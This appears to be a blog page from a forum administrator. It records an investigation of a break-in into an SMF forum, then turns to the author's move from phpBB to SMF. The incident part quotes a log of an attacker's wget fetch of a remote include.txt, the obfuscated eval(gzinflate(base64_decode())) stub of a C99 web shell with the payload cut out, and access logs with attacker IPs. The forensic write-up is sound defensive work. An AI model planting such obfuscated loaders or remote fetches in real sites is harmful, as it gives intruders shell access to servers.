1
2
3
4
5
6
7
8
9
10

--09:57:23--  http://kotzilla.jino-net.ru/include.txt
           => `include.txt'
Resolving kotzilla.jino-net.ru... 217.107.217.29
Connecting to kotzilla.jino-net.ru|217.107.217.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]
 
    0K .......... .......... .......... .......... ...       100%   69.60 KB/s
 
09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those that do not know, the above translates to using wget, or the equivalent, to download a script to your system. With all this being done via Apache and usually from a simple URL designed to exploit a weakness in the given application.

My journey starts here.

Step 1.

1

find / -name include.txt

Nothing. Intruder must have deleted or renamed it.

Step 2.
Check http://kotzilla.jino-net.ru/include.txt for clues.

1
2
3
4
5
6
7

<?PHP
             //Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = ""; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqN..[removed]..f/79z/8A')));
?>

Intruder must think this is clever. Once you decode and inflate the string, it returns…

1

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.
We do not want to execute any PHP code that is an unknown. The only option left is to write a PHP script to decode/inflate until we get at the center…

1
2
3
4
5
6
7
8
9
10
11
12

<?php
$string = "eval(gzinflate(base64_decode('HJ3HkqN..[removed]..f/79z/8A')));";
$pattern = '/^eval\(gzinflate\(base64_decode\('([^'\);]*)/';
$count = 0;
while (preg_match($pattern, $string, $matches) )
{
$count++;
$string = gzinflate(base64_decode($matches[1]));
}
echo "Decoded/Inflated:$count\n";
echo "$string";
?>

Seems to be some type of a web php shell script called C99madShell.

Step 4.
We need to locate the downloaded script…

1

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('

1

/.../forums.devside.net/Themes/readme.php:eval(gzinflate(base64_decode('HJ3Hkq...

Not good!

Step 5.
Check logs.

1

grep 'readme.php' /.../forums.devside.net/access_log

Intruder was up to something no good.

1
2
3
4
5

149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2"
149.156.204.1 - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"
...

Final Analysis.
I’ve search the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL, maybe POST related, or has something to do with the SMF theme function. I run no mods, and use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I'm sure just a hijacked system], the user_id on the forum, the mail account used for activation, but not much anything else.

1
2

resolveip 149.156.204.1
Host name of 149.156.204.1 is nzs.agh.edu.pl

1
2

149.156.204.1 - - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/
read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]…

1
2
3
4
5
6
7

83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&
q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
...
83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"

1
2

resolveip 83.219.135.75
Host name of 83.219.135.75 is ppp135-75.tis-dialog.ru

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first one for SMF.

And for anyone having odd issues with SMF [like getting stuck on 'fetching preview...']…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.

phpBB is dead… long live phpBB!

In an not entirely unexpected email to the team, James “theFinn” Atkinson has, after a number of years inactivity even “behind the scenes” due to personal circumstance, has formally resigned as of the 30th of April, 2007.

The now newly independent phpBB still has the same active contributors and will continue to support the stable phpBB 2.0.x and develop the next-generation phpBB 3.0.x, with James having already allowed the transfer of the www.phpBB.com domain for a majority share of the financial assets that have been generated by the project via advertising to date, so as to minimize disruption to phpBB’s users.

A lot can be read between these lines…

For one, large sums of money are involved here. phpbb.com is a PR10/9 site and handles some serious traffic. And as the saying goes: more money, more problems.

Another is the restructuring of the ‘organization’… While new blood is always welcome, you do not want to lose the part of the team that has learned from making all the mistakes. Not unless you want to repeat your failures.

I’m not exactly sure if version 3.0 is a complete rewrite or just a somewhat incompatible branch, but one thing is certain, wait a while before upgrading.

phpBB v2 has been nothing but trouble.

You can preview the new and improved look at the phpBB Forums.

It generates valid html/css and has more administrative options than phpBB. Though in someways it does feel a bit more complicated to setup and use properly [keep in mind that *I have* been accustomed to using phpBB since 2003, and I did have to perform the extra steps of setting everything up and converting the old forum db to SMF].

On the plus side, it is much more secure than the nightmare called “phpBB”; though I do not like the fact you have to chmod 777 all the files — or at least some subset. Nor the fact that SMF does not seem to have as large of a community base as phpBB, which translates into “good luck finding the info you require, or locating a solution to a problem.”

The biggest hassle right now is with losing all the old URLs that have been indexed, that have good SE positions…

Indexed phpBB URLs are primarily of a post number while SMF uses a system where you have to start with a thread number and only then can you work to the post number. And since I have no way of knowing the thread number, all I can do is redirect back to index.php.

I’m going to stick to the default theme as it has a very clean and simple look. One other theme that I liked was called ‘DilberMC’, with the light silver color and an 800px width.

And just as a note to anyone interested in SMF, while it is free software, it is not GPL. The licensing termed specifically prohibit you from distributing the software in any way, modified or not. All generated copyright notices must also be retained.

phpBB made it possible for devside.net to get hacked, has corrupted the db more than once with some damage, and is now mysteriously creating backups that are different in size by a large margin from the mysql db dumps [compression is taken into account], not to mention all the headaches it has given me.

Here is an article comparing the major Forums…
http://shsc.info/ForumSoftwareGuide

I think when I have the time, I will try out SMF.

As a note, phpBB3 is coming out, and hopefully will be an improvement over the 2.0 branch. And if it is not… I will not be surprised at all.